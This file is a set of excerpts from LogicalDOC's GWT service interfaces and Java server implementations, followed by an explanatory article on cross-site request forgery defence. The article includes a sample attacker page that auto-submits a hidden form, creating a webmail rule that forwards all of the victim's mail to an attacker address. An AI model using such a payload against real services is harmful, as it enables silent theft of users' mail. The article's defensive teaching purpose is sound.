    /**
     * Change session tenant
     */
    public GUITenant changeSessionTenant(long tenantId) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/UpdateService.java
Code (from line 11):

 * 
 * @author Marco Meschieri - LogicalDOC
 * @since 7.3.1
 */
@RemoteServiceRelativePath("update")
public interface UpdateService extends RemoteService {

    /**
     * Check if the current installation has an update package available
     * 
     * @param userNo The current UserNo
     * @param currentRelease The actual release
     * @return List of informations about the available update package or null
     */
    public GUIParameter[] checkUpdate(String userNo, String currentRelease);

    /**
     * Downloads an update package
     * 
     * @param userNo The current UserNo
     * @param id ID of the package to download
     * @param fileName Name of the package file
     * @param fileName Size of the package file expressed in MB
     * @return 0 if the download was successful
     */
    public void download(String userNo, String id, String fileName, int size);

    /**
     * Confirms an update package
     * 
     * @param userNo The update file to confirm
     * @return The path of the update folder
     */
    public String confirm(String updateFileName) throws ServerException;

    /**
     * Retrieves more informations from
     * 
     * @param updateFileName File name of the downloaded update package
     * @return ChangeLog and Install file contents
     */
    public String[] getNotes(String updateFileName) throws ServerException;

    /**
     * Checks the status of the current download process
     * 
     * @return download status code and download progress
     */
    public int[] checkDownloadStatus();
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/WorkflowService.java
Code (from line 8):

/**
 * The client side stub for the Workflow Service. This service gives all needed
 * methods to handle workflows.
 */
@RemoteServiceRelativePath("workflow")
public interface WorkflowService extends RemoteService {
    /**
     * Loads a given workflow from the database
     */
    public GUIWorkflow get(String workflowName) throws ServerException;

    /**
     * Deletes a given workflow
     */
    public void delete(String workflowName) throws ServerException;

    /**
     * Deletes a given workflow instance
     */
    public void deleteInstance(String id) throws ServerException;

    /**
     * Imports a new workflow schema.
     */
    public GUIWorkflow importSchema() throws ServerException;

    /**
     * Creates or updates a workflow
     */
    public GUIWorkflow save(GUIWorkflow workflow) throws ServerException;

    /**
     * Deploys a given workflow
     */
    public void deploy(GUIWorkflow workflow) throws ServerException;

    /**
     * Undeploys a given workflow
     */
    public void undeploy(String workflowName) throws ServerException;

    /**
     * Lists all the workflows on the database
     */
    public GUIWorkflow[] list() throws ServerException;

    /**
     * Deletes a workflow trigger
     */
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/login/client/services/LoginService.java
Code (from line 8):

/**
 * The client side stub for the Login Service. This service gives all needed
 * methods to handle the login operations.
 */
@RemoteServiceRelativePath("login")
public interface LoginService extends RemoteService {
    /**
     * Changes the password of a user
     * 
     * @param userId The user Identifier
     * @param oldPassword can be null
     * @param newPassword
     * @param notify If the new credentials need to be notified
     * @return 0 if all is ok, 1 if the password is incorrect, 2 if the new
     *         password cannot be notified, otherwise a positive number grater
     *         than 2
     */
    public int changePassword(long userId, String oldPassword, String newPassword, boolean notify);

    /**
     * Reset the password for the given email.
     * 
     * @param username the username for which reset password
     * @param emailAddress the email for which reset password
     * @param productName the application product name
     */
    public void resetPassword(String username, String emailAddress, String productName) throws ServerException;

    public GUIUser getUser(String username);
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/setup/client/services/SetupService.java
Code (from line 9):

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("setup")
public interface SetupService extends RemoteService {

    /**
     * Performs a system setup.
     * 
     * @param data The intallation data
     */
    public void setup(SetupInfo data);
}

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/AttributeSetServiceImpl.java
Code (from line 34):

 * Implementation of the AttributeSetService
 * 
 * @author Marco Meschieri - LogicalDOC
 * @since 7.5
 */
public class AttributeSetServiceImpl extends RemoteServiceServlet implements AttributeSetService {

    private static final long serialVersionUID = 1L;

    private static Logger log = LoggerFactory.getLogger(AttributeSetServiceImpl.class);

    @Override
    public void delete(long setId) throws ServerException {
        ServiceUtil.validateSession(getThreadLocalRequest());

        AttributeSetDAO dao = (AttributeSetDAO) Context.get().getBean(AttributeSetDAO.class);
        dao.delete(setId);
    }

    @Override
    public void saveOptions(long setId, String attribute, String[] values) throws ServerException {
        Session session = ServiceUtil.validateSession(getThreadLocalRequest());

        AttributeOptionDAO dao = (AttributeOptionDAO) Context.get().getBean(AttributeOptionDAO.class);
        try {
            Map<String, AttributeOption> optionsMap = new HashMap<String, AttributeOption>();
            List<AttributeOption> options = dao.findBySetIdAndAttribute(setId, attribute);
            for (AttributeOption option : options)
                optionsMap.put(option.getValue(), option);

            for (int i = 0; i < values.length; i++) {
                String value = values[i];
                AttributeOption option = optionsMap.get(value);
                if (option == null) {
                    option = new AttributeOption(setId, attribute, value);
                } else {
                    if (value.equals(option.getValue()) && option.getPosition() == i)
                        continue;
                    option.setValue(value);
                }

                option.setPosition(i);
                dao.store(option);
            }
        } catch (Throwable t) {
            ServiceUtil.throwServerException(session, log, t);
        }
    }
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/ContactServiceImpl.java
Code (from line 27):

 * Implementation of the ContactService
 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.8
 */
public class ContactServiceImpl extends RemoteServiceServlet implements ContactService {

    private static final long serialVersionUID = 1L;

    private static Logger log = LoggerFactory.getLogger(ContactServiceImpl.class);

    @Override
    public void delete(long[] ids) throws ServerException {
        ServiceUtil.validateSession(getThreadLocalRequest());

        try {
            ContactDAO dao = (ContactDAO) Context.get().getBean(ContactDAO.class);
            for (long id : ids) {
                dao.delete(id);
            }
        } catch (Throwable t) {
            log.error(t.getMessage(), t);
        }
    }

    @Override
    public void save(GUIContact contact) throws ServerException {
        ServiceUtil.validateSession(getThreadLocalRequest());
        try {
            ContactDAO dao = (ContactDAO) Context.get().getBean(ContactDAO.class);
            Contact con = dao.findById(contact.getId());
            if (con == null)
                con = new Contact();
            con.setEmail(contact.getEmail());
            con.setFirstName(contact.getFirstName());
            con.setLastName(contact.getLastName());
            con.setCompany(contact.getCompany());
            con.setAddress(contact.getAddress());
            con.setPhone(contact.getPhone());
            con.setMobile(contact.getMobile());
            con.setUserId(contact.getUserId());
            dao.store(con);
        } catch (Throwable t) {
            log.error(t.getMessage(), t);
        }
    }

    @Override
    public GUIContact load(long id) throws ServerException {
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/DocumentServiceImpl.java
Code (from line 90):

 * Implementation of the DocumentService
 * 
 * @author Matteo Caruso - Logical Objects
 * @since 6.0
 */
public class DocumentServiceImpl extends RemoteServiceServlet implements DocumentService {

    private static final long serialVersionUID = 1L;

    private static Logger log = LoggerFactory.getLogger(DocumentServiceImpl.class);

    @Override
    public void addBookmarks(long[] ids, int type) throws ServerException {
        Session session = ServiceUtil.validateSession(getThreadLocalRequest());

        BookmarkDAO bookmarkDao = (BookmarkDAO) Context.get().getBean(BookmarkDAO.class);
        DocumentDAO dao = (DocumentDAO) Context.get().getBean(DocumentDAO.class);
        FolderDAO fdao = (FolderDAO) Context.get().getBean(FolderDAO.class);

        int added = 0;
        int alreadyAdded = 0;
        for (long id : ids) {
            try {
                Bookmark bookmark = null;
                if (bookmarkDao.findByUserIdAndDocId(session.getUserId(), id).size() > 0) {
                    // The bookmark already exists
                    alreadyAdded++;
                } else {
                    bookmark = new Bookmark();
                    bookmark.setTenantId(session.getTenantId());
                    bookmark.setType(type);
                    bookmark.setTargetId(id);
                    bookmark.setUserId(session.getUserId());

                    if (type == Bookmark.TYPE_DOCUMENT) {
                        Document doc = dao.findById(id);
                        bookmark.setTitle(doc.getTitle());
                        bookmark.setFileType(doc.getType());
                    } else {
                        Folder f = fdao.findById(id);
                        bookmark.setTitle(f.getName());
                    }

                    bookmarkDao.store(bookmark);

                    added++;
                }
            } catch (AccessControlException e) {
                ServiceUtil.throwServerException(session, log, e);
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/FolderServiceImpl.java
Code (from line 46):

 * Implementation of the FolderService
 * 
 * @author Matteo Caruso - Logical Objects
 * @since 6.0
 */
public class FolderServiceImpl extends RemoteServiceServlet implements FolderService {

    private static final long serialVersionUID = 1L;

    private static Logger log = LoggerFactory.getLogger(FolderServiceImpl.class);

    @Override
    public GUIFolder inheritRights(long folderId, long rightsFolderId) throws ServerException {
        Session session = ServiceUtil.validateSession(getThreadLocalRequest());

        try {
            FolderDAO fdao = (FolderDAO) Context.get().getBean(FolderDAO.class);

            /*
             * Just apply the current security settings to the whole subtree
             */
            FolderHistory transaction = new FolderHistory();
            transaction.setSession(session);

            if (!fdao.updateSecurityRef(folderId, rightsFolderId, transaction))
                throw new Exception("Error updating the database");

            return getFolder(session, folderId);
        } catch (Throwable t) {
            ServiceUtil.throwServerException(session, log, t);
        }
        return null;
    }

    @Override
    public void applyRights(GUIFolder folder, boolean subtree) throws ServerException {
        Session session = ServiceUtil.validateSession(getThreadLocalRequest());

        try {
            FolderDAO fdao = (FolderDAO) Context.get().getBean(FolderDAO.class);
            Folder f = fdao.findById(folder.getId());
            fdao.initialize(f);

            if (subtree) {
                /*
                 * Just apply the current security settings to the whole subtree
                 */
                FolderHistory history = new FolderHistory();
                history.setSession(session);
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/InfoServiceImpl.java
Code (from line 40):

 * Implementation of the InfoService
 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
public class InfoServiceImpl extends RemoteServiceServlet implements InfoService {

    private static Logger log = LoggerFactory.getLogger(InfoServiceImpl.class);

    private static final long serialVersionUID = 1L;

    @Override
    public GUIInfo getInfo(String locale, String tenantName) {
        ContextProperties config = Context.get().getProperties();

        GUIInfo info = null;
        try {
            info = getInfo(tenantName);
            info.setBundle(getBundle(locale, tenantName));

            Locale withLocale = LocaleUtil.toLocale(locale);
            ArrayList<GUIValue> supportedLanguages = new ArrayList<GUIValue>();

            List<String> installedLocales = I18N.getLocales();
            for (String loc : installedLocales) {
                if ("enabled".equals(config.getProperty(tenantName + ".lang." + loc + ".gui"))) {
                    Locale lc = LocaleUtil.toLocale(loc);
                    GUIValue l = new GUIValue();
                    l.setCode(loc);
                    l.setValue(lc.getDisplayName(withLocale));
                    supportedLanguages.add(l);
                }
            }

            info.setSupportedGUILanguages(supportedLanguages.toArray(new GUIValue[0]));

            LanguageManager manager = LanguageManager.getInstance();
            Collection<Language> languages = manager.getActiveLanguages(tenantName);
            supportedLanguages.clear();
            for (Language language : languages) {
                Locale lc = language.getLocale();
                GUIValue l = new GUIValue();
                l.setCode(lc.toString());
                l.setValue(lc.getDisplayName(withLocale));
                supportedLanguages.add(l);
            }
            info.setSupportedLanguages(supportedLanguages.toArray(new GUIValue[0]));

            List<GUIMessage> messages = new ArrayList<GUIMessage>();
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/LoginServiceImpl.java
Code:

32 * Implementation of the <code>LoginService</code>
33 * 
34 * @author Marco Meschieri - LogicalDOC
35 * @since 7.5
36 */
37 public class LoginServiceImpl extends RemoteServiceServlet implements LoginService {
38 
39     private static final long serialVersionUID = 1L;
40 
41     private static Logger log = LoggerFactory.getLogger(InfoServiceImpl.class);
42 
43     @Override
44     public int changePassword(long userId, String oldPassword, String newPassword, boolean notify) {
45         SecurityServiceImpl ser = new SecurityServiceImpl();
46         return ser.changePassword(userId, oldPassword, newPassword, notify);
47     }
48 
49     @Override
50     public GUIUser getUser(String username) {
51         try {
52             UserDAO userDao = (UserDAO) Context.get().getBean(UserDAO.class);
53             TenantDAO tenantDao = (TenantDAO) Context.get().getBean(TenantDAO.class);
54 
55             User user = userDao.findByUsername(username);
56             if (user == null)
57                 return null;
58 
59             // Get just a few informations needed by the login
60             GUIUser usr = new GUIUser();
61             usr.setId(user.getId());
62             usr.setTenantId(user.getTenantId());
63             usr.setPasswordExpires(user.getPasswordExpires() == 1);
64             usr.setPasswordExpired(user.getPasswordExpired() == 1);
65 
66             Tenant tenant = tenantDao.findById(user.getTenantId());
67 
68             ContextProperties config = Context.get().getProperties();
69             usr.setPasswordMinLenght(Integer.parseInt(config.getProperty(tenant.getName() + ".password.size")));
70 
71             return usr;
72         } catch (Throwable t) {
73             log.error(t.getMessage(), t);
74             return null;
75         }
76     }
77 
78     @Override
79     public void resetPassword(String username, String emailAddress, String productName) throws ServerException {
80         UserDAO userDao = (UserDAO) Context.get().getBean(UserDAO.class);
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/MessageServiceImpl.java
Code:

31 * Implementation of the MessageService
32 * 
33 * @author Marco Meschieri - Logical Objects
34 * @since 6.0
35 */
36 public class MessageServiceImpl extends RemoteServiceServlet implements MessageService {
37 
38     private static Logger log = LoggerFactory.getLogger(MessageServiceImpl.class);
39 
40     private static final long serialVersionUID = 1L;
41 
42     @Override
43     public void delete(long[] ids) throws ServerException {
44         ServiceUtil.validateSession(getThreadLocalRequest());
45         Context context = Context.get();
46         SystemMessageDAO dao = (SystemMessageDAO) context.getBean(SystemMessageDAO.class);
47         for (long id : ids) {
48             dao.delete(id);
49         }
50     }
51 
52     @Override
53     public GUIMessage getMessage(long messageId, boolean markAsRead) throws ServerException {
54         Session session = ServiceUtil.validateSession(getThreadLocalRequest());
55 
56         try {
57             Context context = Context.get();
58             SystemMessageDAO dao = (SystemMessageDAO) context.getBean(SystemMessageDAO.class);
59             SystemMessage message = dao.findById(messageId);
60             dao.initialize(message);
61 
62             GUIMessage m = new GUIMessage();
63             m.setId(message.getId());
64             m.setSubject(message.getSubject());
65             m.setConfirmation(message.getConfirmation() == 1);
66             m.setMessage(message.getMessageText());
67             m.setValidity(message.getDateScope());
68 
69             // If the case mark the message as read
70             if (!message.wasReadBy(session.getUsername())) {
71                 Recipient rec = message.getRecipient(session.getUsername());
72                 if (rec != null) {
73                     rec.setRead(1);
74                     dao.store(message);
75                 }
76 
77                 // If required a notification message must be sent to the sender
78                 if (message.getConfirmation() == 1) {
79                     Date date = new Date();
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchEngineServiceImpl.java
Code:

26 * Implementation of the SearchEngineService
27 * 
28 * @author Matteo Caruso - Logical Objects
29 * @since 6.0
30 */
31 public class SearchEngineServiceImpl extends RemoteServiceServlet implements SearchEngineService {
32 
33     private static final long serialVersionUID = 1L;
34 
35     private static Logger log = LoggerFactory.getLogger(SearchEngineServiceImpl.class);
36 
37     @Override
38     public GUISearchEngine getInfo() throws ServerException {
39         Session session = ServiceUtil.validateSession(getThreadLocalRequest());
40 
41         try {
42             GUISearchEngine searchEngine = new GUISearchEngine();
43 
44             SearchEngine indexer = (SearchEngine) Context.get().getBean(SearchEngine.class);
45             searchEngine.setLocked(indexer.isLocked());
46             searchEngine.setEntries(indexer.getCount());
47 
48             ContextProperties conf = Context.get().getProperties();
49             searchEngine.setExcludePatters(conf.getProperty(session.getTenantName() + ".index.excludes"));
50             searchEngine.setIncludePatters(conf.getProperty(session.getTenantName() + ".index.includes"));
51             searchEngine.setDir(conf.getProperty("index.dir"));
52             searchEngine.setSubwords("true".equals(conf.getProperty("index.subwords")));
53 
54             if (StringUtils.isNotEmpty(conf.getProperty("index.batch")))
55                 searchEngine.setBatch(new Integer(conf.getProperty("index.batch")));
56             else
57                 searchEngine.setBatch(0);
58 
59             if (StringUtils.isNotEmpty(conf.getProperty("parser.timeout")))
60                 searchEngine.setParsingTimeout(new Integer(conf.getProperty("parser.timeout")));
61             else
62                 searchEngine.setParsingTimeout(0);
63 
64             if (StringUtils.isNotEmpty(conf.getProperty("index.maxtext")))
65                 searchEngine.setMaxText(new Integer(conf.getProperty("index.maxtext")));
66             else
67                 searchEngine.setMaxText(0);
68 
69             // Populate the list of supported languages
70             searchEngine.setLanguages("");
71             LanguageManager lm = LanguageManager.getInstance();
72             List<String> langs = lm.getLanguagesAsString(session.getTenantName());
73             for (String lang : langs) {
74                 searchEngine.setLanguages(searchEngine.getLanguages() + "," + lang);
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java
Code:

38 * Implementation of the SearchService
39 * 
40 * @author Marco Meschieri - Logical Objects
41 * @since 6.0
42 */
43 public class SearchServiceImpl extends RemoteServiceServlet implements SearchService {
44 
45     private static final long serialVersionUID = 1L;
46 
47     protected static Logger log = LoggerFactory.getLogger(SearchServiceImpl.class);
48 
49     @Override
50     public GUIResult search(GUISearchOptions options) throws ServerException {
51         Session session = ServiceUtil.validateSession(getThreadLocalRequest());
52         options.setUserId(session.getUserId());
53 
54         GUIResult result = new GUIResult();
55         try {
56             SearchOptions searchOptions = toSearchOptions(options);
57             searchOptions.setTenantId(session.getTenantId());
58 
59             if (searchOptions instanceof FulltextSearchOptions) {
60                 Locale exprLoc = LocaleUtil.toLocale(options.getExpressionLanguage());
61 
62                 Language lang = LanguageManager.getInstance().getLanguage(exprLoc);
63                 if (lang == null) {
64                     // Try to find another supported language
65                     exprLoc = LocaleUtil.toLocale(exprLoc.getLanguage());
66                     lang = LanguageManager.getInstance().getLanguage(exprLoc);
67 
68                     if (exprLoc != null)
69                         ((FulltextSearchOptions) searchOptions).setExpressionLanguage(exprLoc.getLanguage());
70                 }
71             }
72 
73             // Retrieve the search machinery
74             Search search = Search.get(searchOptions);
75 
76             try {
77                 search.search();
78             } catch (Exception e) {
79                 log.error(e.getMessage(), e);
80             }
81 
82             result.setSuggestion(search.getSuggestion());
83             result.setEstimatedHits(search.getEstimatedHitsNumber());
84 
85             List<Hit> hits = search.getHits();
86 
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SecurityServiceImpl.java
Code:

72 * Implementation of the SecurityService
73 * 
74 * @author Marco Meschieri - Logical Objects
75 * @since 6.0
76 */
77 public class SecurityServiceImpl extends RemoteServiceServlet implements SecurityService {
78 
79     private static final long serialVersionUID = 1L;
80 
81     private static Logger log = LoggerFactory.getLogger(SecurityServiceImpl.class);
82 
83     public static GUITenant getTenant(long tenantId) {
84         TenantDAO dao = (TenantDAO) Context.get().getBean(TenantDAO.class);
85         Tenant tenant = dao.findById(tenantId);
86         return fromTenant(tenant);
87     }
88 
89     public static GUITenant fromTenant(Tenant tenant) {
90         if (tenant == null)
91             return null;
92         GUITenant ten = new GUITenant();
93         ten.setId(tenant.getId());
94         ten.setTenantId(tenant.getTenantId());
95         ten.setCity(tenant.getCity());
96         ten.setCountry(tenant.getCountry());
97         ten.setDisplayName(tenant.getDisplayName());
98         ten.setEmail(tenant.getEmail());
99         ten.setName(tenant.getName());
100        ten.setPostalCode(tenant.getPostalCode());
101        ten.setState(tenant.getState());
102        ten.setStreet(tenant.getStreet());
103        ten.setTelephone(tenant.getTelephone());
104        ten.setMaxRepoDocs(tenant.getMaxRepoDocs());
105        ten.setMaxRepoSize(tenant.getMaxRepoSize());
106        ten.setMaxSessions(tenant.getMaxSessions());
107        ten.setMaxUsers(tenant.getMaxUsers());
108        ten.setEnabled(tenant.getEnabled() == 1);
109        ten.setExpire(tenant.getExpire());
110 
111        return ten;
112    }
113 
114    public static GUITenant getTenant(String tenantName) {
115        TenantDAO dao = (TenantDAO) Context.get().getBean(TenantDAO.class);
116        Tenant tenant = dao.findByName(tenantName);
117        return fromTenant(tenant);
118    }
119 
120    /**
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SettingServiceImpl.java
Code:

34 * Implementation of the SettingService
35 * 
36 * @author Matteo Caruso - Logical Objects
37 * @since 6.0
38 */
39 public class SettingServiceImpl extends RemoteServiceServlet implements SettingService {
40 
41     private static final long serialVersionUID = 1L;
42 
43     private static Logger log = LoggerFactory.getLogger(SettingServiceImpl.class);
44 
45     @Override
46     public GUIEmailSettings loadEmailSettings() throws ServerException {
47         Session session = ServiceUtil.validateSession(getThreadLocalRequest());
48 
49         GUIEmailSettings emailSettings = new GUIEmailSettings();
50         try {
51             ContextProperties conf = Context.get().getProperties();
52 
53             emailSettings.setSmtpServer(conf.getProperty(session.getTenantName() + ".smtp.host"));
54             emailSettings.setPort(Integer.parseInt(conf.getProperty(session.getTenantName() + ".smtp.port")));
55             emailSettings
56                     .setUsername(!conf.getProperty(session.getTenantName() + ".smtp.username").trim().isEmpty() ? conf
57                             .getProperty(session.getTenantName() + ".smtp.username") : "");
58             emailSettings.setPwd(!conf.getProperty(session.getTenantName() + ".smtp.password").trim().isEmpty() ? conf
59                     .getProperty(session.getTenantName() + ".smtp.password") : "");
60             emailSettings.setConnSecurity(conf.getProperty(session.getTenantName() + ".smtp.connectionSecurity"));
61             emailSettings
62                     .setSecureAuth("true".equals(conf.getProperty(session.getTenantName() + ".smtp.authEncripted")) ? true
63                             : false);
64             emailSettings.setSenderEmail(conf.getProperty(session.getTenantName() + ".smtp.sender"));
65 
66             log.info("Email settings data loaded successfully.");
67         } catch (Exception e) {
68             log.error("Exception loading Email settings data: " + e.getMessage(), e);
69         }
70 
71         return emailSettings;
72     }
73 
74     @Override
75     public void saveEmailSettings(GUIEmailSettings settings) throws ServerException {
76         Session session = ServiceUtil.validateSession(getThreadLocalRequest());
77 
78         try {
79             ContextProperties conf = Context.get().getProperties();
80 
81             conf.setProperty(session.getTenantName() + ".smtp.host", settings.getSmtpServer());
82             conf.setProperty(session.getTenantName() + ".smtp.port", Integer.toString(settings.getPort()));
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java
Code:

28 * Implements the
29 * 
30 * @author Marco Meschieri - Logical Objects
31 * @since 6.0
32 */
33 public class SetupServiceImpl extends RemoteServiceServlet implements SetupService {
34 
35     private static final long serialVersionUID = 1L;
36 
37     protected static Logger log = LoggerFactory.getLogger(SetupServiceImpl.class);
38 
39     @Override
40     public void setup(SetupInfo data) {
41         data.setRepositoryFolder(data.getRepositoryFolder().replaceAll("\\\\", "/"));
42         File repoFolder = new File(data.getRepositoryFolder());
43         log.warn("Initialize system using repository " + repoFolder);
44         try {
45             makeWorkingDir(repoFolder);
46             createDB(data);
47             writeRegConfig(data);
48 
49             // Setup the correct logs folder
50             try {
51                 ContextProperties pbean = new ContextProperties();
52                 LoggingConfigurator lconf = new LoggingConfigurator();
53                 lconf.setLogsRoot(pbean.getProperty("conf.logdir"));
54                 lconf.write();
55             } catch (Throwable t) {
56                 log.error(t.getMessage(), t);
57                 throw new RuntimeException(t.getMessage(), t);
58             }
59 
60             // Reload the application context in order to reconnect DAOs to the
61             // database
62             Context.refresh();
63 
64         } catch (Throwable caught) {
65             caught.printStackTrace();
66             log.error(caught.getMessage(), caught);
67             throw new RuntimeException(caught.getMessage(), caught);
68         }
69     }
70 
71     private void writeDBConfig(SetupInfo data) throws Exception {
72         try {
73             ContextProperties pbean = new ContextProperties();
74             pbean.setProperty("jdbc.driver", data.getDbDriver() != null ? data.getDbDriver() : "");
75             pbean.setProperty("jdbc.url", data.getDbUrl() != null ? data.getDbUrl() : "");
76             pbean.setProperty("jdbc.username", data.getDbUsername() != null ? data.getDbUsername() : "");
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SystemServiceImpl.java
Code:

55 * Implementation of the SystemService
56 * 
57 * @author Matteo Caruso - Logical Objects
58 * @since 6.0
59 */
60 public class SystemServiceImpl extends RemoteServiceServlet implements SystemService {
61 
62     private static final long serialVersionUID = 1L;
63 
64     private static int progress = 0;
65 
66     private static Logger log = LoggerFactory.getLogger(SystemServiceImpl.class);
67 
68     @Override
69     public boolean disableTask(String taskName) throws ServerException {
70         ServiceUtil.validateSession(getThreadLocalRequest());
71 
72         TaskManager manager = (TaskManager) Context.get().getBean(TaskManager.class);
73         try {
74             Task task = null;
75             for (Task t : manager.getTasks()) {
76                 if (t.getName().equals(taskName)) {
77                     task = t;
78                     break;
79                 }
80             }
81 
82             task.getScheduling().setEnabled(false);
83             task.getScheduling().save();
84 
85             return true;
86         } catch (Throwable e) {
87             log.error(e.getMessage(), e);
88             return false;
89         }
90     }
91 
92     @Override
93     public boolean enableTask(String taskName) throws ServerException {
94         ServiceUtil.validateSession(getThreadLocalRequest());
95 
96         TaskManager manager = (TaskManager) Context.get().getBean(TaskManager.class);
97         try {
98             Task task = null;
99             for (Task t : manager.getTasks()) {
100                if (t.getName().equals(taskName)) {
101                    task = t;
102                    break;
103                }
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/TagServiceImpl.java
Code:

23 * Implementation of the TagService
24 * 
25 * @author Marco Meschieri - Logical Objects
26 * @since 6.0
27 */
28 public class TagServiceImpl extends RemoteServiceServlet implements TagService {
29 
30     private static final long serialVersionUID = 1L;
31 
32     protected static Logger log = LoggerFactory.getLogger(TagServiceImpl.class);
33 
34     @Override
35     public GUITag[] getTagCloud() throws ServerException {
36         Session session = ServiceUtil.validateSession(getThreadLocalRequest());
37         try {
38             ArrayList<GUITag> ret = new ArrayList<GUITag>();
39             DocumentDAO dao = (DocumentDAO) Context.get().getBean(DocumentDAO.class);
40             List<TagCloud> list = dao.getTagCloud(session.getId());
41 
42             for (TagCloud tagCloud : list) {
43                 GUITag c = new GUITag();
44                 c.setScale(tagCloud.getScale());
45                 c.setTag(tagCloud.getTag());
46                 c.setCount(tagCloud.getCount());
47                 ret.add(c);
48             }
49 
50             return ret.toArray(new GUITag[0]);
51         } catch (Throwable t) {
52             return (GUITag[]) ServiceUtil.throwServerException(session, log, t);
53         }
54     }
55 
56     @Override
57     public void delete(String tag) {
58 
59     }
60 
61     @Override
62     public void rename(String tag, String newTag) {
63 
64     }
65 
66     class TagCloudComparatorName implements Comparator<TagCloud> {
67         public int compare(TagCloud tc0, TagCloud tc1) {
68             return tc0.getTag().compareTo(tc1.getTag());
69         }
70     }
71 
...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/TemplateServiceImpl.java
Code:

30 * Implementation of the TemplateService
31 * 
32 * @author Matteo Caruso - Logical Objects
33 * @since 6.0
34 */
35 public class TemplateServiceImpl extends RemoteServiceServlet implements TemplateService {
36 
37     private static final long serialVersionUID = 1L;
38 
39     private static Logger log = LoggerFactory.getLogger(TemplateServiceImpl.class);
40 
41     @Override
42     public void delete(long templateId) throws ServerException {
43         ServiceUtil.validateSession(getThreadLocalRequest());
44 
45         TemplateDAO dao = (TemplateDAO) Context.get().getBean(TemplateDAO.class);
46         dao.delete(templateId);
47     }
48 
49     @Override
50     public GUITemplate save(GUITemplate template) throws ServerException {
51         Session session = ServiceUtil.validateSession(getThreadLocalRequest());
52 
53         TemplateDAO dao = (TemplateDAO) Context.get().getBean(TemplateDAO.class);
54         try {
55             Template templ;
56             if (template.getId() != 0) {
57                 templ = dao.findById(template.getId());
58                 dao.initialize(templ);
59             } else {
60                 templ = new Template();
61             }
62 
63             templ.setTenantId(session.getTenantId());
64             templ.setName(template.getName());
65             templ.setDescription(template.getDescription());
66             templ.setReadonly(template.isReadonly() ? 1 : 0);
67             templ.setType(template.getType());
68 
69             Map<String, Attribute> attrs = new HashMap<String, Attribute>();
70             if (template.getAttributes() != null && template.getAttributes().length > 0) {
71                 templ.getAttributes().clear();
72                 for (GUIAttribute attribute : template.getAttributes()) {
73                     if (attribute != null) {
74                         Attribute att = new Attribute();
75                         att.setPosition(attribute.getPosition());
76                         att.setMandatory(attribute.isMandatory() ? 1 : 0);
77                         att.setType(attribute.getType());
78                         att.setLabel(attribute.getLabel());
...

Defending against Cross-site Request Forgery using GWT

HTTP has no standard mechanism for telling whether the user sent a request intentionally. An attacker can therefore make the victim's browser send a request to a server of the attacker's choosing without the victim knowing, for example by placing images, IFRAME elements and the like on a web page with the attacker's chosen address as their source.

When such a page loads, the victim's browser tries to fetch the external resource by sending a request to that address and attaches the cookies that belong to it. So if the victim is signed in to the target service, the attacker's request is sent under the victim's account.

Example

For a CSRF attack to succeed, the application does not need any particular vulnerability or mistake: any application without the proper defenses is susceptible.

Consider a webmail service. The following is a fragment of the page for creating rules that sort incoming mail automatically:

<form id="SendMailForm" action="http://mail/actions/add" method="POST">
    <p>Action</p>
    <label><input type="radio" name="type" value="reply"> Reply</label>
    <label><input type="radio" name="type" value="forward"> Forward</label>
    <label><input type="radio" name="type" value="remove"> Delete</label>

    <p>Condition</p>
    <input type="text" name="condition"/>

    <p>Target</p>
    <input type="text" name="target"/>
    <input type="submit" name="create"/>
</form>

The user fills in a rule for sorting incoming mail and saves it on the server.

Suppose the user has stopped working in the webmail client and, without logging out, has opened a page prepared by the attacker, for example by clicking a link in an email.

The malicious page contains the following code:

<html>
<head>
    <!-- After loading the document, automatically send its web form -->
    <script type="text/javascript">
        window.onload = function() {
            document.getElementById("CsrfForm").submit();
        }
    </script>
</head>
<body>
    <form id="CsrfForm" action="http://mail/actions/add" method="POST">
        <input type="hidden" name="type" value="forward" />
        <input type="hidden" name="condition" value="any" />
        <input type="hidden" name="target" value="[email protected]" />
    </form>
</body>
</html>

Submitting the CsrfForm form creates a rule on the mail server that forwards all incoming mail on the victim's account to [email protected]

Potential Consequences

CSRF attack consequences vary, and depend on the functionality of the requests that can be forged.

For example, forging requests from the administrator panel of a web application can lead to executing OS commands or to enabling and disabling application subsystems; in effect, the attacker gains full access to the web application.

A common goal of a CSRF attack inside a corporate network (against intranet applications) is modifying data involved in the important business processes that the application automates. In one incident, a vulnerable application on a company intranet let a group of users create warehouse shipping documents for whatever merchandise they wanted; an insider used the vulnerability to create passes for an accomplice, who signed the merchandise out without even working for the company.

Removal Recommendations

• [Necessary] Ensure that the application has no XSS vulnerabilities [1]: a script injected into the application's own origin can read and replay the anti-CSRF token, so most CSRF countermeasures can be bypassed through XSS.

• For optimum protection, identify the most critical operations the application automates and require an additional confirmation for them. The confirmation must carry an unpredictable parameter that the attacker cannot guess; that is what defeats the attack.

